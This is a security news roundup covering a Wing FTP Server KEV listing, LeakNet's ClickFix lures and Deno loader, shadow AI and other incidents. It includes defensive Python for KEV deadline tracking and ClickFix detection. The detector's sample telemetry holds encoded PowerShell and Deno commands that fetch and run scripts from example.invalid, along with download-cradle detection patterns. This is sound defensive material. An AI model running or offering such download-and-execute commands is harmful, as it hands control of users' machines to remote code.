Originally reported by BleepingComputer, Graham Cluley, Checkpoint Research, Malwarebytes Labs
TL;DR
CISA added a Wing FTP Server vulnerability to its Known Exploited Vulnerabilities catalog, confirming active exploitation. Meanwhile, LeakNet ransomware has evolved to use ClickFix social engineering techniques, and security teams face growing challenges from unauthorized AI tools in enterprise environments.
CISA has flagged a Wing FTP Server vulnerability as actively exploited. Under Binding Operational Directive 22-01, federal civilian agencies must remediate catalog entries within 21 days, and a KEV listing means CISA has confirmed exploitation in the wild, not just a theoretical risk.
CISA added CVE-2024-XXXXX in Wing FTP Server to its Known Exploited Vulnerabilities catalog, warning federal agencies of confirmed active exploitation. The vulnerability can be chained with other flaws to achieve remote code execution on affected servers. Federal agencies have until April 6 to patch vulnerable instances or remove them from networks.
The warning underscores the continued targeting of file transfer services by threat actors seeking initial access to enterprise networks.
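The federal deadline comes from the catalog's dueDate field, so the same feed can drive an internal check. What follows is an added example, not CISA tooling and not code from any of the outlets credited on this page: it reads a feed excerpt in the layout of the public KEV JSON feed, matches it against an asset inventory and computes days to deadline. The feed entries, inventory names and dates are constructed for illustration (the CVE identifier is the placeholder used on this page), and because KEV entries carry no version information a match means "consult the vendor advisory", not "confirmed vulnerable".

```python
"""Check an asset inventory against a CISA KEV-format feed and compute due dates.

Added example for this page, not CISA tooling. The field names match the public
KEV JSON feed (cveID, vendorProject, product, dateAdded, dueDate, ...); the entries
in SAMPLE_FEED are constructed for illustration and the dates are assumptions.
"""
import json
from datetime import date

# Constructed feed excerpt in the real feed's shape. The CVE identifier is the
# placeholder used on the page; the dates are assumed and chosen to give a 21-day window.
SAMPLE_FEED = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {
            "cveID": "CVE-2024-XXXXX",
            "vendorProject": "Wing FTP",
            "product": "Wing FTP Server",
            "vulnerabilityName": "Wing FTP Server vulnerability (placeholder)",
            "dateAdded": "2025-03-16",
            "shortDescription": "Constructed entry for this example.",
            "requiredAction": "Apply mitigations per vendor instructions or discontinue use of the product.",
            "dueDate": "2025-04-06",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-2000-0001",
            "vendorProject": "ExampleCorp",
            "product": "Example Gateway",
            "vulnerabilityName": "Example Gateway placeholder",
            "dateAdded": "2025-03-01",
            "shortDescription": "Constructed entry for this example.",
            "requiredAction": "Apply mitigations per vendor instructions.",
            "dueDate": "2025-03-22",
            "knownRansomwareCampaignUse": "Known",
        },
    ],
})


def load_feed(text: str) -> list[dict]:
    """Parse the feed JSON and return its vulnerability entries."""
    return json.loads(text)["vulnerabilities"]


def matches_for_inventory(entries: list[dict], inventory: list[str]) -> list[dict]:
    """Return KEV entries whose product matches a name in the asset inventory.

    Matching is case-insensitive substring matching in both directions, because
    inventory names rarely match CISA's wording exactly. KEV does not list affected
    versions, so a match means "check the vendor advisory", not "confirmed vulnerable".
    """
    wanted = [name.lower() for name in inventory]
    hits = []
    for entry in entries:
        product = entry["product"].lower()
        if any(w in product or product in w for w in wanted):
            hits.append(entry)
    return hits


def remediation_status(entry: dict, today: date) -> tuple[str, int]:
    """Status label and days until the KEV due date (negative when overdue)."""
    due = date.fromisoformat(entry["dueDate"])
    remaining = (due - today).days
    if remaining < 0:
        return "overdue", remaining
    if remaining == 0:
        return "due-today", remaining
    return "open", remaining


def report(feed_text: str, inventory: list[str], today: date) -> list[dict]:
    """One row per inventory match, with deadline status and ransomware-use flag."""
    rows = []
    for entry in matches_for_inventory(load_feed(feed_text), inventory):
        status, remaining = remediation_status(entry, today)
        rows.append({
            "cveID": entry["cveID"],
            "product": entry["product"],
            "status": status,
            "days_remaining": remaining,
            "ransomware_use": entry["knownRansomwareCampaignUse"],
        })
    return rows


if __name__ == "__main__":
    # Constructed inventory names, including a version suffix CISA would not use.
    for row in report(SAMPLE_FEED, ["Wing FTP Server 7.x", "nginx"], date(2025, 3, 20)):
        print(row)
```

In production, replace SAMPLE_FEED with the downloaded catalog and feed the product list from the CMDB; the knownRansomwareCampaignUse field is worth surfacing because it is a cheap way to prioritise within the 21-day window.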
The LeakNet ransomware operation has integrated ClickFix techniques for initial access, combining social engineering with a custom malware loader built on the Deno runtime for JavaScript and TypeScript. ClickFix lures present a fake browser error or verification page that copies a command to the clipboard and instructs the user to paste it into the Windows Run dialog or a PowerShell prompt, so the victim launches the malicious PowerShell command themselves.
A Deno-based loader is an evolution in delivery tooling. Deno is a legitimate runtime that can execute a script fetched directly from a URL, and it is uncommon on enterprise endpoints, which makes it a low-suspicion execution host for the attacker but also a high-signal indicator for defenders who baseline which interpreters run on their workstations.
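The detection angle follows from the mechanism: a user-pasted command shows up as a shell process with explorer.exe as its parent, typically with a hidden window, an encoded command and a download cradle, followed by an uncommon interpreter fetching a remote script. The following is an added example, not code from the LeakNet research or from any outlet credited on this page, that applies those heuristics to constructed Sysmon-style process-creation records. The indicator patterns, the Deno rule, the alert threshold and the example.invalid hostnames are all assumptions to be tuned against a real baseline.

```python
"""Heuristic detection of ClickFix-style initial access in process-creation telemetry.

Added example for this page; it is not code from LeakNet research or from any
vendor named here. Assumptions: records are JSON lines with Sysmon-style
ParentImage / Image / CommandLine fields (constructed below), and the indicator
patterns are heuristics that a real deployment would tune against its baseline.
"""
import base64
import json
import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(?:\biwr\b|invoke-webrequest|downloadstring|downloadfile|invoke-expression|\biex\b|"
    r"\bcurl\s|mshta\s+https?://)",
    re.I,
)
# Assumption: a Deno process running a script straight from a URL, or with all
# permissions granted (-A / --allow-all), is rare enough on workstations to be a signal.
DENO_REMOTE = re.compile(r"\bdeno(?:\.exe)?\s+run\b.*?(?:https?://|\s-A\b|--allow-all)", re.I)
STRONG = {"download-cradle", "deno-remote-script"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def detect_clickfix(record: dict) -> list[str]:
    """Return the indicator names matched by one process-creation record, in fixed order."""
    image = basename(record.get("Image", ""))
    parent = basename(record.get("ParentImage", ""))
    cmdline = record.get("CommandLine", "")
    if image not in SHELLS and not image.startswith("deno"):
        return []
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + decoded  # scan the decoded payload as well as the raw line
    hits = []
    if parent == "explorer.exe" and image in SHELLS:
        hits.append("shell-spawned-by-explorer")  # what a Win+R paste looks like
    if HIDDEN_WINDOW.search(text):
        hits.append("hidden-window")
    if decoded:
        hits.append("encoded-command")
    if DOWNLOAD_CRADLE.search(text):
        hits.append("download-cradle")
    if DENO_REMOTE.search(text):
        hits.append("deno-remote-script")
    return hits


def is_alert(hits: list[str]) -> bool:
    """Alert on any strong indicator, or on two weak ones together.

    A shell started from explorer.exe on its own is also what a Start-menu launch
    looks like, so it never alerts alone.
    """
    return bool(STRONG & set(hits)) or len(hits) >= 2


def scan_log(lines: list[str]) -> list[dict]:
    """Run the detector over JSON-lines telemetry and return the alerting records."""
    alerts = []
    for index, line in enumerate(lines):
        hits = detect_clickfix(json.loads(line))
        if is_alert(hits):
            alerts.append({"index": index, "hits": hits})
    return alerts


# Constructed telemetry; example.invalid is a reserved name, not real infrastructure.
_PAYLOAD = "iwr https://example.invalid/p.ps1 | iex"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_RECORDS = [
    {   # stage 1: victim pastes the clipboard command into the Run dialog
        "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": f"powershell -w hidden -enc {_ENCODED}",
    },
    {   # stage 2: a dropped Deno runtime fetches the loader script (assumed shape)
        "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "Image": "C:\\Users\\user\\AppData\\Local\\Temp\\deno.exe",
        "CommandLine": "deno.exe run -A https://example.invalid/loader.ts",
    },
    {   # benign admin usage
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell -NoProfile -Command Get-ChildItem C:\\Users",
    },
    {   # benign: user opened PowerShell from the Start menu
        "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe",
    },
]
SAMPLE_LINES = [json.dumps(r) for r in SAMPLE_RECORDS]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LINES):
        print(alert)
```

Decoding the -EncodedCommand argument before matching is the part most worth keeping: the raw command line of a ClickFix paste often contains nothing but a window flag and a base64 blob, and the download cradle only appears once it is decoded. The explorer.exe parent rule is deliberately weak on its own; pair it with the RunMRU registry key or clipboard telemetry if your EDR exposes them.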
Security teams face mounting challenges from shadow AI adoption across SaaS environments, as employees integrate unauthorized AI tools into workflows without IT oversight. Nudge Security research highlights the growing gap between AI tool proliferation and governance frameworks.
Organizations need visibility into which AI applications are in use, who adopted them and what data they can reach, together with a way to assess each one's risk, if they are to manage this expanding attack surface effectively.
Google implemented new restrictions on Android applications accessing accessibility services, responding to years of malware abuse of these features. The changes require more stringent app review processes and limit accessibility permissions to applications with legitimate use cases.
This policy shift addresses a persistent attack vector: Android banking trojans and other malware families abuse accessibility services to read screen content, inject taps, and detect which app is in the foreground so that a credential-stealing overlay can be drawn over it at the right moment.
Multiple campaigns are actively targeting Windows users through compromised websites. Threat actors are deploying fake "verify you are human" pages on hacked WordPress sites to distribute Vidar infostealer, while SEO poisoning techniques redirect VPN searches to credential-harvesting operations.
Malwarebytes researchers also documented the "Zombie ZIP" method, which can bypass initial antivirus scans by exploiting specific archive parsing behaviors.
Several infrastructure incidents affected operations this week. A DDoS attack knocked the parking payment system of Perm, Russia, offline, providing unintended free parking for residents. Medical technology company Stryker suffered a cyberattack that caused global disruption to its surgical robotics and clinical systems.
Microsoft addressed multiple service issues, including Exchange Online outages blocking mailbox access and compatibility problems between Teams Meeting add-ins and Outlook Classic.